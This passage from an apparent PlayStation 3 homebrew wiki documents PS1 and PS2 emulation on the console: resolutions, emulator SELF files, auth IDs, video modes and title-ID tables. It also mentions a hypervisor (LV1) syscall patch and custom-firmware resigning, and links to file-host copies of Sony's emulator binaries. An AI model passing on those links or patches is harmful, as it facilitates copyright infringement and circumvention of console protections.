(occasionally 384 e.g. SF Zero 3 but not X-Men vs SF which was shrunk to 368), 512 or 640<br /> * Vertical: 240 (NTSC), 256 (PAL), 480 (NTSC), 512 (PAL)<br /> Tekken 3 uses a strange pixel area of 368x480. Regardless of the screen area, the aspect ratio is still 4:3 for all PlayStation games.<br /> Very common resolutions : 320x240 for NTSC and 320x256 for PAL.<br /> <br /> ==== PS2 Native Resolution ====<br /> Video output resolution: variable from 256x224 to 1280x1024 pixels<br /> <br /> ==== PS/PS2 Upscaling &amp; smoothing ====<br /> Options added to XMB since 1.80++ Both options can be set individually.<br /> <br /> PS/PS2 upscaling:<br /> * Off - Disable upscaled output.<br /> * Normal - Upscale and display at a size that matches the screen size (keep 4:3 aspect ratio)<br /> * Full - Upscale and display at full screen by changing proportions and stretching the image (to widescreen)<br /> <br /> PS/PS2 smoothing:<br /> * Off - Disable smoothing<br /> * On - Use smoothing to reduce the roughness of the displayed image (note: when titles that support progression scan have this option turned on, they revert back to 480p with no alterations)<br /> <br /> Samples: http://uk.ps3.ign.com/articles/793/793775p1.html<br /> <br /> === Manual starting SELF method ===<br /> #Insert PSX/PSone disc (region/pressed doesn't matter)<br /> #Start MultiMAN (e.g. 2.07.01++)<br /> ::*Since 02.07.05 the PSX and PS2 discs are properly detected. PSX discs will show in XMB Game Column and you can launch the PS1 game from there. It uses ps1_emu.self default (you can choose Load or Load (Net), latter uses ps1_netemu).<br /> #Switch to filemanager mode<br /> #Browse to /dev_flash/ps1emu<br /> #Select either one of the ps1 emulation SELF files<br /> <br /> Note: Some games run better with ps1_emu.self (e.g. Motal Kombat) while others run better with ps1_netemu.self (e.g. Resident Evil 3). If it doesn't work, try another ps1 emulation SELF file.<br /> <br /> Downside: memory card options are unavailable unless you created a Virtual Memorycard ''before'' starting MultiMAN (XMB::Category Game:: Memory Card Utility (PS/PS2) &gt; Create a PS1 memory card. Set it to Slot 1 (Press Triangle while selecting the Memory Card, then Assign it). Note: naming it &quot;Internal Memory Card&quot; sometimes works better than other names. MultiMAN 02.07.07 seems to solve the savegame issues.<br /> <br /> ==== Changes in MultiMAN 2.07.00/01 for ps1_emu handling ====<br /> These options where needed to make above work:<br /> * Added: LV2 access rights to use LV1 Storage Manager (syscall 864)<br /> * Added: LV1 patch for user access to sys_storage functions (syscalls 600 to 623)<br /> <br /> == ps2emu ==<br /> [[File:Ps2_block_diagram.png|200px|thumb|right|Simplified block diagram of a PS2&lt;br /&gt;[http://www.philvaz.com/games/PS2.htm source]]]<br /> Note: <br /> * not available in early Tool/DECR and Debug/DEX firmwares. <br /> * Emulation is based on a SCPH-50000/SCPH-20401 Playstation 2 Model.<br /> * Supported Peripherie (ps2emu):<br /> #Hub<br /> #Mouse<br /> #Keyboard<br /> #EyeToy<br /> #Head Mount Display<br /> #Mic<br /> #Ascii Mic<br /> #Socom USB Headset<br /> #Usb Headset<br /> #Sea Mic Controller<br /> #Force Feedback device<br /> #GT Force<br /> #Momo Force<br /> #Driving Force Pro<br /> #G25<br /> #Momo Racing<br /> #Flight Force<br /> #Force 3D Pro<br /> #Modem<br /> #Guncon2<br /> #Densya de GO! controller type 2<br /> #Densya de GO! Sincansen senyou controller<br /> #Capture Eye<br /> #Flight Stick<br /> #Flight Stick 2<br /> #Pop Egg<br /> #Trance Vibrator<br /> #PSP<br /> #Compact Flight Controller<br /> #Flash Memory<br /> #Buzz!<br /> #Pachi-Slot Controller Kurouto<br /> #Usb Adapter<br /> #Guncon3<br /> #Multi Train Controller<br /> * Supported Peripherie (netemu): <br /> #BD Remote Control, <br /> #PLAYSTATION(R)3 Controller (Vendor ID 0x54C, Product ID 0x268), <br /> #Sub-Controller (Vendor ID 0x54C, Product ID 0x3D5), <br /> #Navigation Controller, <br /> #&quot;guncon3&quot;<br /> (Unk: Vendor ID 0x54C, PID 0x42F / Vendor ID 0xF0D, Product ID 0x4A / Vendor ID 0x54C, Product ID 0x5AF )<br /> <br /> === Files ===<br /> ps2_emu.self (1.02++)<br /> ps2_gxemu.self (1.50++)<br /> ps2_softemu.self (1.90++) 1.90-1.94 (11065), 2.00-2.10 (11830), 3.15 (12840), 3.41-3.65 (13474), 3.66-3.70 (15435), 3.72-4.21 (15529)<br /> (Changes: -2.50] [2.52-2.60] [2.70] [2.80] [3.00-3.65] [3.66-3.70] [3.74])<br /> ps2_netemu.self (3.70++)<br /> <br /> http://www.crocko.com/651925F44E444D8390E41A39A577BE48/ps2emu.rar<br /> &lt;!--// http://filerio.in/2xjqscjklj72<br /> http://freakshare.com/files/bp53qpcy/ps2emu.rar.html //--&gt;<br /> <br /> http://www.mirrorcreator.com/files/4BNITIXD/ps2_netemu.7z_links<br /> <br /> <br /> dev_hdd0/tmp/game/ps2bootparam.dat<br /> <br /> === Mountpoints ===<br /> dev_ps2disc<br /> dev_ps2disc1 <br /> <br /> <br /> === LPAR / AUTH ID's ===<br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Name !! Auth ID !! Self&lt;br /&gt;(/dev_flash/ps2emu) !! Notes<br /> |-<br /> | PS2_LPAR || 0x1020000003000001 || rowspan=&quot;2&quot; | ps2_emu.self || <br /> |-<br /> | *SCE_CELLOS_SYSTEM_MGR_PS2 || 0x107000001D000001 || <br /> |-<br /> | PS2_GX_LPAR || 0x1020000003000001 || rowspan=&quot;2&quot; | ps2_gxemu.self || <br /> |-<br /> | *SCE_CELLOS_SYSTEM_MGR_PS2_GX || 0x107000001D000001 || <br /> |-<br /> | PS2_SW_LPAR || 0x1020000003000001 || rowspan=&quot;2&quot; | ps2_softemu.self || <br /> |-<br /> | *SCE_CELLOS_SYSTEM_MGR_PS2_SW || 0x107000001D000001 || <br /> |-<br /> | PS2_NE_LPAR || 0x1020000003000001 || rowspan=&quot;2&quot; | ps2_netemu.self || <br /> |-<br /> | *SCE_CELLOS_SYSTEM_MGR_PS2_NE || 0x107000001D000001 || <br /> |-<br /> |}<br /> <br /> ==== boot_ps2 ====<br /> http://foxbrew.org/ps3/otheros-utils/boot_ps2.git &lt;br /&gt;<br /> [http://www.multiupload.com/QKK7ETPHXZ boot_ps2-src.rar (1.43 KB)] &lt;br /&gt;<br /> [http://www.multiupload.com/YCZ63Y6TQ5 boot_ps2.pkg (69.17 KB)] &lt;br /&gt;<br /> <br /> any chance of having this package resigned for 4.21 cfw? might be useful to see if it'll boot ps2_netemu.self LPAR.<br /> <br /> (can boot ps2lpar, but also petitboot if otheros installed! 50:50 chance)<br /> <br /> [http://rghost.net/42586725 boot_ps2 4.xx eboots.zip (153 KB)] &lt;br /&gt; installing 3.55 pkg and replacing the eboot and editing the sfo should work.<br /> <br /> === Video Modes ===<br /> '''Note:''' Real PS2 : http://users.neoscientists.org/~blue/ps2videomodes.txt<br /> <br /> Video Modes<br /> ----.-----------.---------------.-----------.-----------.<br /> No | Name | Resolution | fV(Hz) | fH(kHz) |<br /> ----+-----------+---------------+-----------+-----------|<br /> 0 | NTSC-NI | 640x240(224) | 59.940 | 15.734 |<br /> 1 | NTSC-I | 640x480(448) | 59.820 | 15.734 |<br /> 2 | PAL-NI | 640x288(256) | 50.000 | 15.625 |<br /> 3 | PAL-I | 640x576(512) | 49.760 | 15.625 |<br /> 4 | VESA-1A | 640x480 | 59.940 | 31.469 |<br /> 5 | VESA-1C | 640x480 | 75.000 | 37.500 |<br /> 6 | VESA-2B | 800x600 | 60.317 | 37.879 |<br /> 7 | VESA-2D | 800x600 | 75.000 | 46.875 |<br /> 8 | VESA-3B | 1024x768 | 60.004 | 48.363 |<br /> 9 | VESA-3D | 1024x768 | 75.029 | 60.023 |<br /> 10 | VESA-4A | 1280x1024 | 60.020 | 63.981 |<br /> 11 | VESA-4B | 1280x1024 | 75.025 | 79.976 |<br /> 12 | DTV-480P | 720x480 | 59.940 | 31.469 |<br /> 13 | DTV-1080I | 1920x1080 | 60.000 | 33.750 |<br /> 14 | DTV-720P | 1280x720 | ?? | ?? |<br /> ----^-----------^---------------^-----------^-----------'<br /> <br /> === Controller ===<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! ID !! Controller #Number !! Note<br /> |-<br /> | 1 (1-A) || 1 ||<br /> |-<br /> | 2 (2-A) || 2 ||<br /> |-<br /> | 3 (1-B) || 3 ||<br /> |-<br /> | 4 (2-B) || 4 ||<br /> |-<br /> | 5 (1-C) || 5 || Gamepad LED #1 + #4<br /> |-<br /> | 6 (2-C) || 6 || Gamepad LED #2 + #4<br /> |-<br /> | 7 (1-D) || 7 || Gamepad LED #3 + #4<br /> |-<br /> |}<br /> <br /> === PS2 Classics Emulator (ps2_netemu.self) ===<br /> <br /> [[PS2_Classics_Emulator_Compatibility_List|PS2 Classics Emulator Compatibility List]]<br /> <br /> Tested renaming ps2_netemu.self to ps2_emu.self on CECHB01/rogero 4.21 with dev_blind mounting via multiMAN but boots to black screen, no disc activity, but controller shuts off and is synced. No PS button menu or anything.<br /> <br /> boot_ps2.pkg boots, no disc activities, then throws up an error depending if the file is resigned for 4.21 or not. (tried both a resigned and the existing version)<br /> <br /> *General observations regarding PS2 Classics emulator:<br /> ** Virtual memory cards are per title based, but apparantly run through the current memory card system. The module used to manage memory cards is: vmc_savedata_plugin.sprx - Using a regular memory card that has been renamed result in a &quot;The save data is corrupt (8XXXXXXX) error&quot;<br /> ** Loads an epilepsy warning before PS2 logo (PS button menu appears during epilepsy warning if controller is synced)<br /> ** Does not support online functionality of PS2 titles (network configuration utility inside Full Spectrum Warrior claims no network adaptor has been found, same with Syphon Filter: The Omega Strain).<br /> <br /> - Only file that is needed in the folder for PS2 Classics is &quot;iso.bin.enc&quot;. Removing the manuals/DXT files will cause the game to boot IMMEDIATELY to the PS2 logo upon switching to 720p/starting PS2 LPAR.<br /> <br /> ==== folder/file layout ====<br /> (in this example GTA San Andreas Classic)<br /> &lt;pre&gt;<br /> [NPUD20946]<br /> [USRDIR]<br /> [CONTENT]<br /> 001.dxt<br /> 002.dxt<br /> 003.dxt<br /> 004.dxt<br /> 005.dxt<br /> 006.dxt<br /> 007.dxt<br /> 008.dxt<br /> 009.dxt<br /> 010.dxt<br /> 011.dxt<br /> 012.dxt<br /> 013.dxt<br /> 014.dxt<br /> 015.dxt<br /> 016.dxt<br /> 017.dxt<br /> Others.dxt<br /> Manual.idx<br /> [SAVEDATA]<br /> SCEVMC0.VME<br /> SCEVMC1.VME<br /> CONFIG<br /> ISO.BIN.EDAT<br /> ISO.BIN.ENC<br /> PS3LOGO.DAT<br /> PARAM.SFO<br /> ICON0.PNG<br /> PIC0.PNG<br /> PIC1.PNG<br /> PIC2.PNG<br /> &lt;/pre&gt;<br /> <br /> === TitleID/DiscID in ps2_netemu.self ===<br /> There are 193 titleIDs listed inside ps2_netemu.self (for switching compatibility flags?)<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! ID in ps2_netemu.self !! Title !! Remarks<br /> |-<br /> |-<br /> | SLUS_214.52 || Valkyrie Profile 2: Silmeria || <br /> |-<br /> | SLUS_214.04 || Final Fantasy XI: Treasures of Aht Urhgan || <br /> |-<br /> | SLUS_213.39 || Puzzle Challenge || <br /> |-<br /> | SLUS_213.31 || Sonic Riders || <br /> |-<br /> | SLUS_210.89 || Karaoke Revolution Vol.3 || <br /> |-<br /> | SLUS_210.70 || Final Fantasy XI: Chains of Promathia || <br /> |-<br /> | SLUS_210.59 || Tekken 5 || <br /> |-<br /> | SLUS_209.18 || Super Monkey Ball: Deluxe || <br /> |-<br /> | SLUS_208.91 || Star Ocean: Til the end of Time [Disc 2] || <br /> |-<br /> | SLUS_208.51 || Ace Combat 5: The Unsung War || <br /> |-<br /> | SLUS_208.38 || All-Star Baseball 2005 || <br /> |-<br /> | SLUS_206.86 || Splashdown: Rides Gone Wild || <br /> |-<br /> | SLUS_206.39 || Def Jam Vendetta || <br /> |-<br /> | SLUS_206.35 || Muppets Party Cruise || <br /> |-<br /> | SLUS_205.90 || Spyhunter 2 || <br /> |-<br /> | SLUS_205.72 || Tiger Woods PGA Tour 2003 || <br /> |-<br /> | SLUS_204.88 || Star Ocean: Til the end of Time [Disc 1] || <br /> |-<br /> | SLUS_204.33 || SWAT: Global Strike Team || <br /> |-<br /> | SLUS_204.13 || Shadowman 2 || <br /> |-<br /> | SLUS_203.64 || Tiger Woods PGA Tour 2002 || <br /> |-<br /> | SLUS_203.05 || Simpsons: Road Rage || <br /> |-<br /> | SLUS_202.74 || City Crisis || <br /> |-<br /> | SLUS_200.77 || Donald Duck: Go'in Quackers || <br /> |-<br /> | SLUS_200.11 || Orphen: Ocion of Sorcery || <br /> |-<br /> | SLPS_732.49 || Ar tonelico Qoga: Knell of Ar Ciel (Platinum) || <br /> |-<br /> | SLPS_257.27 || Routes PE || <br /> |-<br /> | SLPS_257.22 || Routes PE (Limited Edition) || <br /> |-<br /> | SLPS_257.21 || HimeHibi - Princess Days || <br /> |-<br /> | SLPS_257.09 || The Familiar of Zero || <br /> |-<br /> | SLPS_257.08 || The Familiar of Zero (Limited Edition) || <br /> |-<br /> | SLPS_256.98 || Fatal Fury Battle Archives Volume 2 || <br /> |-<br /> | SLPS_256.67 || Daito Giken Premium Pachi-Slot Collection: Yoshimune || <br /> |-<br /> | SLPS_256.04 || Ar tonelico Qoga: Knell of Ar Ciel || <br /> |-<br /> | SLPS_255.86 || Tales of the Abyss || <br /> |-<br /> | SLPS_255.85 || Monster Farm 5: Circus Caravan || <br /> |-<br /> | SLPS_255.10 || Tekken 5 || <br /> |-<br /> | SLPS_254.18 || Ace Combat 5: The Unsung War || <br /> |-<br /> | SLPS_254.06 || Hitman: Contracts || <br /> |-<br /> | SLPS_253.79 || Tokyo Majin Gakuen: Kaihoujyou Kefurokou || <br /> |-<br /> | SLPS_253.57 || 3-Nen B-Gumi Kinpachi Sensei: Densetsu no Kyoudan ni Tate! || <br /> |-<br /> | SLPS_253.15 || One Piece: Grand Battle 3 || <br /> |-<br /> | SLPS_252.90 || Time Crisis 3 || <br /> |-<br /> | SLPS_252.78 || Memories Off: Mix || <br /> |-<br /> | SLPS_252.75 || Def Jam: Vendetta || <br /> |-<br /> | SLPS_252.37 || Only You || <br /> |-<br /> | SLPS_251.50 || Only You || <br /> |-<br /> | SLPS_251.42 || Tiger Woods PGA Tour 2002 || <br /> |-<br /> | SLPS_251.36 || Kuon no Kizuna Sairin Mikotonori || <br /> |-<br /> | SLPS_250.81 || Saishuu Densha || <br /> |-<br /> | SLPS_250.72 || A Visual Mix: Ayumi Hamasaki Dome Tour 2001 || <br /> |-<br /> | SLPS_250.71 || A Visual Mix: Ayumi Hamasaki Dome Tour 2001 || <br /> |-<br /> | SLPS_250.08 || Sorcerous Stabber Orphen || <br /> |-<br /> | SLPS_204.55 || Simple 2000 Series Vol.94: The Aka-Champion - Come on Baby || <br /> |-<br /> | SLPS_204.29 || Hissatsu Pachi-Slot Evolution: Ninja Hattori-Kun V || <br /> |-<br /> | SLPS_204.04 || Rakushou! Pachi-Slot Sengen 2 || <br /> |-<br /> | SLPS_202.00 || Final Fantasy XI || <br /> |-<br /> | SLPS_201.99 || F1 2002 || <br /> |-<br /> | SLPS_201.97 || Surfing Air Show with RatBoy || <br /> |-<br /> | SLPS_201.73 || Hard Hitter 2 || <br /> |-<br /> | SLPS_201.72 || Koushien: Konpeki no Sora || <br /> |-<br /> | SLPS_201.11 || Magical Sports Pro Baseball 2001 || <br /> |-<br /> | SLPS_201.01 || City Crisis || <br /> |-<br /> | SLPS_200.66 || Tenshi no Present: Marle Oukoku Monogatari || <br /> |-<br /> | SLPS_200.53 || Tenshi no Present: Marle Oukoku Monogatari (Limited Edition) || <br /> |-<br /> | SLPS_200.38 || Grappler Baki: Baki Saidai no Tournament || <br /> |-<br /> | SLPS_200.37 || Go Go Golf || <br /> |-<br /> | SLPS_200.20 || FIFA 2000 World Championship || <br /> |-<br /> | SLPS_200.08 || Morita Shogi || <br /> |-<br /> | SLPM_680.10 || || <br /> |-<br /> | SLPM_680.07 || Karaoke Revolution (Trial) || <br /> |-<br /> | SLPM_665.74 || Detective Evangelion || <br /> |-<br /> | SLPM_665.58 || Tomb Raider: Legend || <br /> |-<br /> | SLPM_665.39 || Nobunaga no Yabou Online: Haten no Shou || <br /> |-<br /> | SLPM_664.36 || Aria the Natural || <br /> |-<br /> | SLPM_663.94 || Final Fantasy XI: Treasures of Aht Urhgan || <br /> |-<br /> | SLPM_663.93 || Final Fantasy XI: Treasures of Aht Urhgan (All-In-One Edition) || <br /> |-<br /> | SLPM_661.75 || Akumajo Dracula: Yami no Juin || <br /> |-<br /> | SLPM_661.56 || Marheaven: Arm Fight Dream || <br /> |-<br /> | SLPM_660.57 || Taito Memories Vol.1 || <br /> |-<br /> | SLPM_660.48 || The Sword of Etheria || <br /> |-<br /> | SLPM_660.33 || The Sword of Etheria || <br /> |-<br /> | SLPM_659.84 || Grand Theft Auto: San Andreas || <br /> |-<br /> | SLPM_659.53 || Final Fantasy: XI (Entry Disc 2005) || <br /> |-<br /> | SLPM_659.34 || Maple Colors || <br /> |-<br /> | SLPM_658.94 || Winning Post 6: 2005 Version || <br /> |-<br /> | SLPM_657.83 || Nobunaga no Yabou Online: Tappi no Shou || <br /> |-<br /> | SLPM_657.19 || Burnout 3: Takedown || <br /> |-<br /> | SLPM_657.06 || Final Fantasy XI: Chains of Promathia (All-In-One Edition) || <br /> |-<br /> | SLPM_657.05 || Final Fantasy XI: Chains of Promathia (Expansion Disc) || <br /> |-<br /> | SLPM_656.98 || Love Songs: ADV Futaba Riho 14-sai Natsu || <br /> |-<br /> | SLPM_656.33 || I Love Baseball: Pro Yakyu wo Koyonaku || <br /> |-<br /> | SLPM_654.88 || Grand Theft Auto: Vice City || <br /> |-<br /> | SLPM_654.39 || Star Ocean: Till the End of Time (Director's Cut) (Disc 2) || <br /> |-<br /> | SLPM_654.38 || Star Ocean: Till the End of Time (Director's Cut) (Disc 1) || <br /> |-<br /> | SLPM_652.09 || Star Ocean: Till the End of Time || <br /> |-<br /> | SLPM_651.97 || Nobunaga's Ambition Online || <br /> |-<br /> | SLPM_650.90 || Spy Hunter || <br /> |-<br /> | SLPM_650.87 || A Visual Mix: Ayumi Hamasaki Dome Tour 2001 (Disc 2) || <br /> |-<br /> | SLPM_650.86 || A Visual Mix: Ayumi Hamasaki Dome Tour 2001 (Disc 1) || <br /> |-<br /> | SLPM_625.29 || Karaoke Revolution: Kazoku Idol Sengen || <br /> |-<br /> | SLPM_625.28 || Karaoke Revolution: Kazoku Idol Sengen (Bundle Edition) || <br /> |-<br /> | SLPM_624.92 || Karaoke Revolution: Kids Song Selection || <br /> |-<br /> | SLPM_624.91 || Mega Man: The Power Battle || <br /> |-<br /> | SLPM_624.79 || Karaoke Revolution: J-Pop Vol.9 || <br /> |-<br /> | SLPM_624.64 || Pop'n Taisen Pazurudame Online || <br /> |-<br /> | SLPM_624.57 || Karaoke Revolution: Snow &amp; Party || <br /> |-<br /> | SLPM_624.56 || Karaoke Revolution: J-Pop Vol.8 || <br /> |-<br /> | SLPM_624.55 || Karaoke Revolution: J-Pop Vol.7 || <br /> |-<br /> | SLPM_624.54 || Karaoke Revolution: J-Pop Vol.6 || <br /> |-<br /> | SLPM_624.51 || Karaoke Revolution: J-Pop Vol.5 || <br /> |-<br /> | SLPM_624.50 || Karaoke Revolution: Anime Song Selection || <br /> |-<br /> | SLPM_624.37 || Suisui Sweet: Amai Ai no Mitsukekata || <br /> |-<br /> | SLPM_624.14 || Karaoke Revolution: Dreams &amp; Memories || <br /> |-<br /> | SLPM_623.83 || Karaoke Revolution: Night Selection 2003 || <br /> |-<br /> | SLPM_623.82 || Karaoke Revolution: Love &amp; Ballad || <br /> |-<br /> | SLPM_623.81 || Karaoke Revolution: J-Pop Vol.4 || <br /> |-<br /> | SLPM_623.80 || Karaoke Revolution: J-Pop Vol.3 || <br /> |-<br /> | SLPM_623.79 || Karaoke Revolution: J-Pop Vol.2 || <br /> |-<br /> | SLPM_623.69 || Karaoke Revolution: J-Pop Vol.1 || <br /> |-<br /> | SLPM_622.39 || Supercar Street Challenge || <br /> |-<br /> | SLPM_621.54 || DDRMAX Dance Dance Revolution 6thMix || <br /> |-<br /> | SLPM_621.35 || Final Fantasy: XI (Beta Version) || <br /> |-<br /> | SLPM_621.25 || Gauntlet: Dark Legacy || <br /> |-<br /> | SLPM_621.24 || Ready 2 Rumble Boxing: Round 2 || <br /> |-<br /> | SLPM_621.05 || Taikou Risshiden IV || <br /> |-<br /> | SLPM_620.62 || Gitaroo Man One || <br /> |-<br /> | SLPM_620.42 || Kurogane no Houkou: Warship Commander || <br /> |-<br /> | SLES_537.96 || FIFA Street 2 || <br /> |-<br /> | SLES_537.55 || Castlevania: Curse of Darkness || <br /> |-<br /> | SLES_536.68 || Micro Machines v4 || <br /> |-<br /> | SLES_530.37 || Super Monkey Ball Deluxe || <br /> |-<br /> | SLES_520.97 || SWAT: Global Strike Force || <br /> |-<br /> | SLES_519.97 || SWAT: Global Strike Team || <br /> |-<br /> | SLES_518.44 || Time Crisis 3 || <br /> |-<br /> | SLES_518.41 || SpyHunter 2 || <br /> |-<br /> | SLES_514.79 || Def Jam Vendetta || <br /> |-<br /> | SLES_512.82 || Tiger Woods PGA Tour 2003 || <br /> |-<br /> | SLES_507.29 || || <br /> |-<br /> | SLES_507.28 || Tiger Woods PGA Tour 2002 || <br /> |-<br /> | SLES_506.28 || Simpsons: Road Rage || <br /> |-<br /> | SLES_506.08 || Shadow Man 2: The Second Coming || <br /> |-<br /> | SLES_505.40 || Simpsons: Road Rage || <br /> |-<br /> | SLES_504.46 || Shadow Man 2: The Second Coming || <br /> |-<br /> | SLES_503.64 || City Crisis || <br /> |-<br /> | SLES_500.62 || Orphen: Scion of Sorcery || <br /> |-<br /> | SLES_500.48 || Donald Duck: Quack Attack || <br /> |-<br /> | SCUS_972.69 || Final Fantasy XI [Disc 2] || <br /> |-<br /> | SCUS_971.67 || PaRappa the Rapper 2 || <br /> |-<br /> | SCPS_200.39 || || <br /> |-<br /> | SCPS_175.01 || Linux (for PlayStation2) Release 1.0 || <br /> |-<br /> | SCPS_170.01 || Gran Turismo 4 || <br /> |-<br /> | SCPS_150.39 || Lifeline || <br /> |-<br /> | SCPS_150.38 || Lifeline || <br /> |-<br /> | SCPS_110.22 || Yoake no Mariko 2nd Act || <br /> |-<br /> | SCPS_110.21 || Yoake no Mariko 2nd Act (Limited Edition) || <br /> |-<br /> | SCPS_110.18 || Yoake no Mariko || <br /> |-<br /> | SCPS_110.10 || Yoake no Mariko (Performance Pack Edition) || <br /> |-<br /> | SCPS_110.01 || I.Q. Remix || <br /> |-<br /> | SCPN_601.60 || PlayStation BB Navigator (Version 0.32) || <br /> |-<br /> | SCPN_601.50 || PlayStation BB Navigator (Version 0.31) || <br /> |-<br /> | SCPN_601.40 || PlayStation BB Navigator (Version 0.30) || <br /> |-<br /> | SCPN_601.30 || PlayStation BB Navigator (Version 0.20) || <br /> |-<br /> | SCPN_601.01 || PlayStation BB Navigator (Version 0.10) || <br /> |-<br /> | SCPM_621.16 || || <br /> |-<br /> | SCPM_621.15 || || <br /> |-<br /> | SCKA_200.49 || Tekken 5 || <br /> |-<br /> | SCES_532.02 || Tekken 5 || <br /> |-<br /> | SCAJ_201.26 || Tekken 5 || <br /> |-<br /> | SCAJ_201.25 || Tekken 5 || <br /> |-<br /> | PTPX_970.38 || || <br /> |-<br /> | PSXC_002.03 || PSX Update Disc 1.31 || <br /> |-<br /> | PSXC_002.02 || PSX Update Disc 1.20 || <br /> |-<br /> | PSXC_002.01 || PSX Update Disc 1.10 || <br /> |-<br /> | PDPX_991.09 || DVD Player (Version 3.04) || <br /> |-<br /> | PBPX_955.18 || || <br /> |-<br /> | PBPX_955.09 || Linux for PS2 Release 1.0 || <br /> |-<br /> | PBPX_955.07 || Playstation 2 Linux Runtime Environment v1.0 (Disc 1) || <br /> |-<br /> | PBPX_955.01 || Linux for PS2 Beta Release 1 || <br /> |-<br /> | PBPX_952.39 || Online Start Up Disc v3.0 || <br /> |-<br /> | PBPX_952.35 || || <br /> |-<br /> | PBPX_952.28 || || <br /> |-<br /> | PBPX_952.24 || DVD Player (Version 2.16) || <br /> |-<br /> | PBPX_952.22 || DVD Player (Version 2.14) || <br /> |-<br /> | PBPX_952.21 || DVD Player (Version 2.12) || <br /> |-<br /> | PBPX_952.11 || DVD Utility Disc Version 1.00 || <br /> |-<br /> | PBPX_952.10 || DVD Utility Disc Version 2.10 || <br /> |-<br /> | PBPX_952.09 || DVD Player (Version 2.10) || <br /> |-<br /> | PBPX_952.08 || DVD Player (Version 2.10) || <br /> |-<br /> | PBPX_952.07 || DVD Player (Version 2.10) || <br /> |-<br /> | PBPX_952.06 || DVD Player (Version 2.01) || <br /> |-<br /> | PBPX_952.03 || DVD Utility Disc Version 1.01 || <br /> |-<br /> | PBPX_952.02 || DVD Utility Disc Version 1.01 || <br /> |-<br /> | PBPX_952.01 || DVD Utility Disc Version 1.00 || <br /> |-<br /> |}<br /> <br /> === TitleID/DiscID in game_ext_plugin ===<br /> <br /> Mainly Final Fantasy 11, Nobunaga Ambition Online, Socom IDs and the required HDD Gigabyte amount for install onto the internal hdd.<br /> <br /> Speculation: flags are AND' with 0,1,2 (selected from sys_sm_get_hw_config according to ps2emu hardware flags? 0 = no hw?, 1 = gxemu?, 2=full hw? )<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> ! flags !! DiscID !! Alternative? DiscID !! GigaByte !! Title !! 0 = VMC&lt;br&gt;1 = IMAGE.DAT !! Internal Name? !! GigaByte<br /> |-<br /> |0xFFFF || &quot;SLPS20200&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLPM65705&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLPM65706&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLPM65953&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLPM66393&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLPM66394&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLPM66893&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLPM66894&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLPM55229&quot; || &quot;SLPS25200&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SLPM-25200.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0x0001 || &quot;SLPM65197&quot; || &quot;SLPM65197&quot; || 0x07 || &quot;信長の野望 Online&quot; || 1 || &quot;PP.SLPM-65197.MAGIC.APPLICATION&quot; || 0x07<br /> |-<br /> |0x0001 || &quot;SLPM65783&quot; || &quot;SLPM65197&quot; || 0x07 || &quot;信長の野望 Online&quot; || 1 || &quot;PP.SLPM-65197.MAGIC.APPLICATION&quot; || 0x07<br /> |-<br /> |0x0001 || &quot;SLPM66539&quot; || &quot;SLPM65197&quot; || 0x07 || &quot;信長の野望 Online&quot; || 1 || &quot;PP.SLPM-65197.MAGIC.APPLICATION&quot; || 0x07<br /> |-<br /> |0x0001 || &quot;SLPM66954&quot; || &quot;SLPM65197&quot; || 0x07 || &quot;信長の野望 Online&quot; || 1 || &quot;PP.SLPM-65197.MAGIC.APPLICATION&quot; || 0x07<br /> |-<br /> |0xFFFF || &quot;SCUS97269&quot; || &quot;SCUS97269&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SCUS-97266.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLUS21070&quot; || &quot;SCUS97269&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SCUS-97266.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLUS21404&quot; || &quot;SCUS97269&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SCUS-97266.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLUS21694&quot; || &quot;SCUS97269&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || &quot;PP.SCUS-97266.MAGIC.APPLICATION&quot; || 0x15<br /> |-<br /> |0xFFFF || &quot;SLUS21704&quot; || &quot;SCUS97269&quot; || 0x15 || &quot;FINAL FANTASY XI&quot; || 1 || 